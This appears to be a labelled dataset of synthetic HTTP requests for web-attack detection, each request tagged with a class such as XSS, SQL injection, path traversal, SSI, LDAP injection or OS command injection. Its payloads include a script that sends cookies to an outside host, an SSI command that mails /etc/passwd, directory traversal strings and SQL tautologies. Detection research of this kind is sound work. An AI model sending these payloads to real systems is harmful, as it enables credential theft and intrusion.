Authorization: Digest cnonce="gbd9a8u"
Range: 0932-655,7-822597,-7
Referer: /turjo/5eilaiee.pl
TE: trailers,deflate;q=0.7
User-Agent: 8edqas7/8.5.5.4
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: gzip
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43699
Start - Id: 44842
class: PathTransversal
GET /@bin2zExl9/e.lmkeO3GB2S/PacoNfs/eYo1Z.s.Jn_BSyW9TAPq/e-RSUSbm9/tg.bin?EsO45ObABN=dti&lsr=5797865&pBPIjam0=104798&nsmcm=aoieextermtU+sshutdownu&ayg1obFdtdIPsp=05858&8rad=ret&om=.%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.0
Host: www.6las0shp9t.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.2, compress, deflate
Accept-Language: rpgYirr-erb;q=0.5, tflide-emt00m;q=0.4, G-ge;q=0.0, ena-4rfs8aji;q=0.2, efElUwt-AtPsL;q=0.1
Cache-Control: no-transform
Client-ip: 55.4.250.85
Cookie: fOlinkWG3meta6Y= uutnn;qtG6Br4nQ7M9=22M8_p9oUl
Cookie2: $Version="393"
Date: Wed, 06 Jun 07 15:00:07 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Fri, 03 Sep 04 05:55:58 CET
If-Unmodified-Since: Tue, 28 Jul 09 18:50:35 UTC
If-Match: *
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: "dzVSPsF.JFjMnHL"
Max-Forwards: 87
MIME-Version: 8.7
Pragma: N='eoa'
Proxy-Authorization: Basic bTNkZHI6aHRlcm9l
Authorization: NTLM cTNzbnRUZWV0YnhyYTd0dXY2bm1zZTNnc2htaWVybnJleFRyc3RvcnJv
Range: 47909-613115,-508364
Referer: /ehEnetBI/sAe3/rtka/exditn/cokionoe.jsp
TE: chunked,trailers,chunked;q=0.3
Trailer: From
User-Agent: yCeh7ithb/7.2.3.9.7
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 2.5 127.214.120.94
Transfer-Encoding: deflate
Upgrade: hrct/3.0, dPt4s/3.9, anna/4.3, o2h/3.1, rsp/8.4
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 083276
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44842
Start - Id: 48119
class: XSS
GET /4A2Eh/cY107AtvsgaF2j/ePsD4Z6DrOP.n/gcgx3dO0epPe6l/26tOiilDEp21/eLEm8bu8kO_NQm/po1Ntoecafawsq/fd@X/51Uj7_Hl/lrahiuer4Rf2e5.gif?qshdtaiathe3b=8&dtmpj1tscriptN=id%40QZ%40JANeM&tA=8dixi0nwajxi&N2yo82tyo=o63oUs1&iIez1zpa=%26%3Cscript++++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ormaonna.com%2Fcgi-bin%2Fenge.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&l7cDsoo=28&Oejsiehmaeotry=2eaic&EdxE=o%40taall&1YvFV3=adqho&heSse0eiek=02092 HTTP/1.1
Host: 0.205.44.213
Connection: arate3
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 193.109.62.83
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Wed, 26 Dec 07 17:35:03 UTC
ETag: W/"5f_rOYoCLLiXItY"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Mon, 15 Mar 04 09:33:52 GMT
If-Unmodified-Since: Wed, 13 Oct 04 22:29:56 CET
If-Match: "WlgHts13DlvSAD08T"
If-None-Match: "@GwpnaTLqpFz@0Ul"
If-Range: *
Max-Forwards: 302
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /Senzrn/ee4e.txt
TE: gzip
Trailer: Accept-Charset
User-Agent: nthdte (eFiRQ_)
UA-CPU: 68000
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: identity
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48119
Start - Id: 45152
class: PathTransversal
GET ////? HTTP/1.0
Host: www.uosima.st:11
Connection: aRqtanj
Accept: video/*, video/*;q=0.5
Accept-Charset: cp-936;q=0.1, iso-2022-jp;q=0.8, euc-jp, x-mac-turkish
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 240.134.41.171
Cookie: H5ZkNQ=e=ga)passwdhswiopenupdatee eftrlink;E0rTb3=?u|in6Mst;Ej9t2=shduge
Cookie2: $Version="70"
Date: Tue, 15 Sep 09 21:57:45 UTC
ETag: "ixxuf3Z-vZWAZT2Jzmk"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Wed, 24 Sep 08 08:27:01 CET
If-Unmodified-Since: Fri, 18 Feb 05 14:07:59 UTC
If-Match: *
If-None-Match: *
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: /erivaeai/odotn3/auga/4nwaai.js
TE: trailers
Trailer: Host
User-Agent: lu@nKpBp http://www.ntAcop.biz
UA-Disp: 991,007,8
Via: 6.8 www.lsreEs5r.html:547
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------

null

End - Id: 45152
Start - Id: 37970
class: LdapInjection
GET /lbtazihottc/iZMJdPzgsxwp-_/rL9jxe3_uxFn/eVUmtjk8@9Jgk/4XcoNf/ehguiey/hrio5tirwiuat1lo5/eBfIDrG.php3?osettmcrmoobiat=detopeneu&lhmsrhfdtd=idoben%2Fhr%40xta0ar%2B&ngvhHda0y=%29+%28++%7C++%28oZs%3Drse*%29&ogKie0cizxoe=2749&eef=9925 HTTP/1.1
Host: www.piw3o.cz:6
Connection: close
Accept: video/*, video/*;q=0.7, image/png
Accept-Charset: x-mac-greek, iso-2022-jp;q=0.1, hz-gb-2312;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=23531
Client-ip: 163.204.117.84
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="4"
Date: Wed, 25 Jun 08 05:39:20 GMT
ETag: W/"jQeRBav8P0NWemhnD."
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Thu, 26 Jun 08 16:16:04 CET
If-Match: "S5oSgYbyA8T8uQ7t.Md"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: im4o0 xt8ceo3a=mTmhl
Range: -8,482604-
Referer: /umHwnn9n/sme8gel.avi
TE: gzip,deflate;q=0.1
Trailer: Warning
User-Agent: seeawbSEan (tpHL.@i; iBmPK@-@; hNBUoua)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37970
Start - Id: 36027
class: PathTransversal
GET /m7f3AHxAip1dC5sM-U7A/fesoleLothawloelzr/uM0JD-6xb/aG/2dprepwJtgmrr.asp?md9adoIel=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.hNds5taaf.biz
Connection: payents
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.4, euc-kr;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: t70-d1c6e2;q=0.4, u-at;q=0.4, r-tb;q=0.2, o-wral;q=0.4
Cache-Control: no-cache
Client-ip: 110.116.43.149
Cookie: tr=Rs1usuchleshrtoAn;o1l42netcat.8=mY@uX4Dxtm;dea=by8I;62J0UIVxtermX@Jimg=pE;kiclarod9n=ca+enstenl;c8Pf7U7@w=7gXlGxn5NGF.
Cookie2: $Version="5"
Date: Sat, 05 Sep 09 06:21:25 CET
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: eahHqSh@pqrt.com
If-Modified-Since: Tue, 15 Apr 08 07:22:48 UTC
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: *
If-Range: Fri, 03 Jul 09 16:36:31 UTC
Max-Forwards: 7012
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Basic c2V0d2h0bDoxcmx5aQ==
Range: -05066,-92,-024075
Referer: http://eeziA.it/c0rn9/6lo9aNce/ipue0/rpslifu.html
TE: chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/7.3 (compatible; MSIE 6.1; WinNT; lulAboreLa; s6tYzvi; m7utahiOQE)
UA-Disp: 097,2396,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: deflate
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 341 181.125.130.56 "jenecjbHicooniain4f" "Thu, 13 Apr 06 16:57:19 GMT"
X-Forwarded-For: 99.130.22.61
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36027
Start - Id: 36876
class: LdapInjection
GET /te7xgocn/fcG5AoFk_cJgDxj0rK/nPkzuq55p.IWsosF5Pw/iopetsmAgwudstevuuns/eeten6tgor9ttespRa6t/yBFo5ng/SOO52C.nsf?8Hnph-uS-yXryV=+sr3ue%26dtmpgodnNw&mq6z=airE&eyneeoaewoeric6=e62&iopocmte8peR=wv7l&e2onb=3201&ftuWkdxterm@A=ewindow.openxbetween&amhMrheefbr9e=oaExmltke+dtmpprocessing-instructionsdeletemn HTTP/1.0
Host: 164.172.179.166
Connection: close
Accept: application/*;q=0.9, audio/*;q=0.5, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 0ch-ilf, l-sritni, lt3sfaS-on
Cache-Control: no-store
Client-ip: 170.158.92.160
Cookie: @e4Pxhuq=gohj79;rstrhzhecb=645627;el=")(targetfilter=(o=NetscapeRoot));lrlnrea37OLn=pstmpsscriptl<rsaS
Cookie2: $Version="587"
Date: Thu, 24 May 07 24:05:18 UTC
ETag: "--Y7YlXawGzC8dsW"
If-Modified-Since: Sun, 09 Nov 08 09:32:44 GMT
If-Unmodified-Since: Sun, 16 Mar 08 10:06:37 GMT
If-Match: "nRrfsS_CwBMPKK9"
If-None-Match: "u@cF.xQeqlQd8BURPqx"
If-Range: Tue, 30 Jun 09 06:50:49 UTC
Max-Forwards: 59
MIME-Version: 1.2
Pragma: ts5='bdet'
Authorization: Basic YTVZTGV0OklyaGVk
Referer: /evruiabT/itesh6/tbmaoi83/lmooAe/RCAjim.txt
TE: trailers
User-Agent: eentna0ducsoqttbwn
UA-OS: Windows NT
UA-Pixels: 420x727
Via: 9.5 135.236.79.205, FTP/6.4 www.zcsie.html

null

End - Id: 36876
Start - Id: 39383
class: SSI
GET /6kNLYLkLeqKGBmTitVs/tR980t/nGtzjHK0.dll?ina=hBzywu&ceeurfnoXUu=nSQe8OcIF&diidsaC3Ltt=2378&dT=7&u9inrpOttre=uonth6bat0&TmireonidOt=75908&0irskhe=nUr&x8uEaraiqtimnoe=%25u&sdJselzcnrs=ai&hIds=13115622&h1babfnXe=%3C%21--%23email+fromhost%3D%22www.kdo2Rn6.com%22+tohost%3D%22mailbox.spnd.com%22+message%3D%222loos+moaImkn+tsdrbsd1+4kres%22+fromaddress%3D%22naonP.com%22+toaddress%3D%22z4zpy.cejef.com%22+subject%3D%22i%22+sender%3D%22td.com%22+replyto%3D%22geabg.com%22+cc%3D%22oqH%22+inreplyto%3D%22zcqe+tErE+e8unm%22+id%3D%22outmail%22+--%3E&QnczuWKmailMd3D=tdlrtgjxosauoetin&aal=uyynrddcagtre&m1lh=kb+s HTTP/1.1
Host: 86.233.0.191
Connection: close
Accept: image/*;q=0.9, video/*
Accept-Charset: windows-1257, utf-7;q=0.9, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 242.172.212.87
Cookie: 5en=33;f2@FA19SPGU=< @;kieierlyecANsrd=09077215;smttentFesel=netrasy0jrsu;nodvGcjefKA_=ahatoil5mmform
Cookie2: $Version="734"
Date: Sun, 01 Apr 07 24:02:47 GMT
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: 100-continue
From: lece@srdgy.org
If-Modified-Since: Wed, 27 Sep 06 10:07:28 UTC
If-Unmodified-Since: Sun, 20 Dec 09 23:38:36 GMT
If-Match: "eG3E@nsn1yEyHK6r8KHc"
If-None-Match: "Ywl2nk3GWx5g8osfI_U"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 7158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: uriec enihpu=eed4it
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://www.assvve6u.cz/3s0dEat/vtXoltae/mcBwiw4n/cpee2em.rar
TE: gzip,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (X11; U; Unix 5.6; sy-l0; rv:8.9.4) Gecko/92567509
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 757x2155
Via: 1.1 www.ptdOm.gif
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39383
Start - Id: 38814
class: LdapInjection
GET /4lQinsertw8Hky1x/R3tDxJZ9q./FGM6RGZ.yJN0/nxP..vz/ecr8U9dQDq4e-K/cOnz5ZTftlpG5cwodKl/plhrs/Wrons8hmttnq/ta/entoait2k.msf?Uiee5bera3=363894&ufieftkjwt=98&BuUMzj4-JkX7=%7Emp&KoOY-roD=el4%29%28%26%28objectClass+%3D+++5eit*%29 HTTP/1.0
Host: www.1wengHelt.de
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity, deflate;q=0.1, gzip;q=0.8, identity
Accept-Language: *;q=0.2
Cache-Control: tLrsnoes=oAelbrig
Client-ip: 103.147.207.153
Cookie: mtcmRaaoei=068;usvtndigr2ehmLo=enggrmr3didmz;pD=74870294;542Ucusr=wtnoi5etzgi7;feygo=991661
Cookie2: $Version="420"
Date: Mon, 10 Nov 08 11:20:38 UTC
ETag: W/"XO.R8JWcEWuUM9wv"
Expect: stgenha=alean
From: Emhleev@7nsic.de
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Tue, 21 Dec 04 12:54:51 UTC
If-Match: "HLWZlC.Es18LxLYdIi-J"
If-None-Match: *
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 75
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: lrNcan sehde=9auTs3e
Range: 635-4999,578-28594,-3
Referer: http://retlaekp.org/pIHaafm/pee8/a6ny.exe
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: nt6Ngb http://www.yibSesaG.cz
UA-CPU: 68000
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.4 181.37.175.127, rEi/4.5 www.n5aul4d7.js:293
Transfer-Encoding: identity
Upgrade: nnttd/5.1, egt/5.4, hhil/2.6, yoxamn/4.2, errtdt/4.7
Warning: 488 www.sneni.css "slektgO" "Fri, 04 Jan 08 16:42:53 GMT"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38814
Start - Id: 40866
class: SSI
GET /eeltasqfe/9emlclGxEto/_5A_6Jio_QTr/t.ZwLsrpoZ1FT/uheaobehkcean/rGUhhTw/m4hsHO6ahkaboI.jpg?ToT=26919&i2aul=%24s&dSrtolmNMo=%3C%21--++++%23odbc+connect%3D%22et2%2CAitk%2CcLiyn%22+++++statement%3D%22select+*++++from++ntn%22--%3E&irlnyavetad0R=0871&_lZ0Gw=58&ldhgnpn8olsl=509430&trteqEattbqbH=tmognwindow.opentema+&eNA.o0_=gSzoh5AAq&c2f=eooNeKOV&sc=et%28-s%402%25xyScdvp&eko=tq&eTerrfidtem=ikegtfcw%25em HTTP/1.1
Host: 129.148.98.1
Connection: close
Accept: text/*, application/zip;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: min-fresh=4693
Client-ip: 175.185.183.88
Cookie: Pf9vHTand=atttb;tZaloNnok0=37175236;a0E1liah1t=rIHH;hbChaRrgDdheesi=oKr9OFN;SwinntkW2lXg=0317739
Cookie2: $Version="380"
Date: Thu, 16 Jun 05 02:59:13 UTC
ETag: "sKr@_Vwhn_E5hW1u"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Tue, 29 Dec 09 24:42:30 UTC
If-Match: *
If-None-Match: "UG7kmIY9R5TH53PVf"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 6384
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: rntkji toRhkeu=swaote
Range: -375,-4
Referer: http://t6n0uo2t.net/vehfelht/cecyh/nietsyc/Lgar/g4qceOe.jpg
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/9.2 (X11; U; Solaris 4.5; t3-it; rv:0.7.4) Gecko/14983857
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40866
Start - Id: 35268
class: SqlInjection
GET /shVN@za/eG/e2277vs_47Q4LG5QNkBF/tWE49Gey2ZVVmZ/serido/tAtnaeoabh4lign0gr/rtmdeEmewea/eOTLeEUmTsV_Cvv_u/efqaFl5nz/-v/aytX8y4mMCsKIEkpn.cfm?.WFHeqr1WTNO=tleg&druteimcse9=hfml8E9&TwzsarfTnvne=%26ANergej&tSiG9psGSi=%27+++OR+++%27%27+++%3D++%27&Aadwse=878&2nyznrUnoeieo=eej&biree0zsyhi=5tf%405E61r HTTP/1.1
Host: 117.196.18.177
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, deflate, deflate;q=0.9
Accept-Language: scegrrW0-raoqatau
Cache-Control: no-store
Client-ip: 155.132.155.102
Cookie: tsf=iamlaoedatelm5o4o;_servicesyF0jRuu5=dcd9w5wya;etrSitGisNnssp=nhtpass;zf;i3Jidhtdn=eb0rMG4R3r;iCncK0YU3g0=ro+
Cookie2: $Version="87"
Date: Sat, 07 May 05 13:00:07 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: meahwq=liroah;ooftt
From: lpter@0feo.uk
If-Modified-Since: Wed, 13 Jan 10 14:17:18 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: *
If-None-Match: "1blDjOEEciyxGZ5iMbD-"
If-Range: Wed, 01 Sep 04 10:12:36 UTC
Max-Forwards: 9
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nc=5dA9257d
Authorization: n7ouho 0tad=wpehygri
Range: 930-456,2355-
Referer: /fste8f/ekEn4geD/vpweNn/tsNePmgc.shtml
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (compatible; d5Trsno; Windows NT; gej1oPoyu; 9hoP)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/1.6 www.l4ebsode.jpeg:0039, FTP/3.0 14.121.231.100
Transfer-Encoding: compress
Upgrade: o9e/7.6, Srr/2.4, rwihen/5.2, raoelr/6.2
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 32650890830963017
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35268
Start - Id: 36248
class: PathTransversal
GET /pMsX.cqm@WIiLCSn/ehnsHpnt1idmltemIlh/eeieoIywsraT/ezUdiI6BR0/erpJW6eiuy2oIBg/LrTgXsY.jpg?eauuaT=itr%5DevWwinntpieeNhn6hreplace&gneges7=catSnulloC7lognariscripteE%5CDOTpc&snddeNnN7t=1vetigNS&iaft3r414tnincs=dtrdoesros%24lu&xdtOaxitss2=kFpNefrrs&67dEsierm=fptaV1TG&Zwp-dMJlC=br&uiredlet=cNft0e5E8&etaraee=unmailt&srQuhCyaNhNdan=4iov&nenetgenuAkaB=iin5&4diI=qvOGOQKNKK7H&eyaehemhteplnh=Cutiiframeinu-oa&ii5M=tmqtcihie HTTP/1.0
Host: 66.117.243.182
Connection: if5td0oy
Accept: video/mpeg;q=0.9
Accept-Charset: euc-kr;q=0.0, koi8, iso-8859-6;q=0.5
Accept-Encoding: deflate;q=0.9, deflate;q=0.3, identity;q=0.1, deflate, gzip
Accept-Language: Qjh-o;q=0.0, iseeaot-eeienrua;q=0.9, eggsig0o-h;q=0.9, uexp-eidtngse, ienn-Onrhle
Cookie: DtNdsnaqcr=uane;r6ste7aujna=mAwu2P;aoers0fTcf3i=85524541;iJNKJL=winntii e;Hsystem2PBm=ikm.ipA;hnsiirrihcols=/,,,/hrepzz/n6/passwd
Date: Mon, 06 Sep 04 16:11:20 CET
If-Match: *
If-None-Match: "ZorvBLKojpaUAjtsV"
Max-Forwards: 82
Referer: /Eivmcur/pStimu/tiohbuah.cgi
Trailer: Expect
User-Agent: rlson0 (awpRqJBXNI; r_c7RT)
UA-Color: color16
Via: FTP/9.7 www.ho4sfs.js, 2.6 72.240.237.220, 4.7 108.218.102.243
Transfer-Encoding: compress

null

End - Id: 36248
Start - Id: 40158
class: SSI
GET /0kvtLREY5/eTpsreTieai/3Dwl_ok/giH5N8EB4EH89FV/lfNkVegZda_DzjsK/tdsr7hteh/tKAE/ps2Gc-fycZs0KNI.htm?rlae1d=9.mck0&hllkamterira=oLcm&5Rzis2q=9&cyEnu8hdotan=%3C%21--%23exec++++cmd%3D%22%2Fbin%2Fmail+++ooBa.com++%3C++++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: 238.137.78.219:80
Connection: btme
Accept: audio/x-wav;q=0.4, text/*;q=0.2, audio/*;q=0.0
Accept-Charset: iso-2022-kr;q=0.7
Accept-Encoding: 
Accept-Language: h-eebKga;q=0.5, gzoes-nr;q=0.2, sx-fp;q=0.2
Cache-Control: only-if-cached
Client-ip: 163.65.44.55
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Fri, 28 Nov 08 23:05:14 UTC
ETag: W/"fwPq9i.9FDenawS"
Expect: ljsnetti=cinenyns
From: stce@ygsk.st
If-Modified-Since: Wed, 22 Nov 06 24:24:58 UTC
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: "6ZVmDXScwW89ocZqsEZ"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: Basic a2RsdHRhbzpsb3RkZQ==
Range: 728-,7-688430
Referer: /fnnessnl/rtfasSfn/1Rpmf/eVduKm/5oioe.cgi
TE: gzip
Trailer: Warning
User-Agent: s9oeeH/3.9
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 2.9 www.neST.htm, 3.6 www.dgul.css
Transfer-Encoding: compress
Upgrade: lindtc/2.8, 2eli/0.2, l1flm/2.2
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40158
Start - Id: 46499
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.taetmamrd.cz
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: x-mac-turkish;q=0.9, x-mac-icelandic;q=0.0, windows-1258, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="88"
Date: Fri, 04 Jul 08 09:53:04 UTC
ETag: W/"4Q2Q8kPVSy5KUOAmh"
Expect: ninwdknn
From: musoa@e4qteeenfg.net
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Tue, 23 Sep 08 18:30:23 CET
If-Match: *
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 922
MIME-Version: 0.6
Pragma: e='sfn'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aXp4czE6c2xhag==
Range: 8-112855,2026-165541
Referer: http://5bIuLh.uk/en4E.exe
TE: trailers,trailers
Trailer: Upgrade
User-Agent: p2syheSlo3ed
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/9.6 www.9wrn.css, opoth/0.8 77.181.138.141, FTP/9.5 www.adh2h.css
Transfer-Encoding: otsn; troe=con6a
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46499
Start - Id: 43541
class: OsCommanding
GET /itsEene/o3ZP5Rqz2pKP8Mh9U4/.Mm/fsaEtuae4tYejnHs/qIVDFO.9mi8wUezYUKT/aobqpcZS0@46/maileval0mrUKQ/uTuzt/buuxKKuBK.shtml?lUbeahbswsefm=6ssneCoq&4zqnaCz=2295&yldehsino=mrDT&91s=qeedi&LcnOwtTit=na&EheokxRoCtpeAT=4a%5C&ronkdtRgcagt5t=Rom&mkch=l%27i%2Fcopyhi%7E8a&d7mewepee=%7C+id+%7C&spee2aaCetcEnhe=189118&6x=de&wEdjktsgoe=107058 HTTP/1.1
Host: 216.121.6.57
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-jp, iso-8859-6, iso-2022-jp, x-mac-japanese;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: 5tOeo='UeeuhjrA'
Client-ip: 214.70.1.175
Cookie: 9cLBgB7cBi=2133077;eGe7=6703552
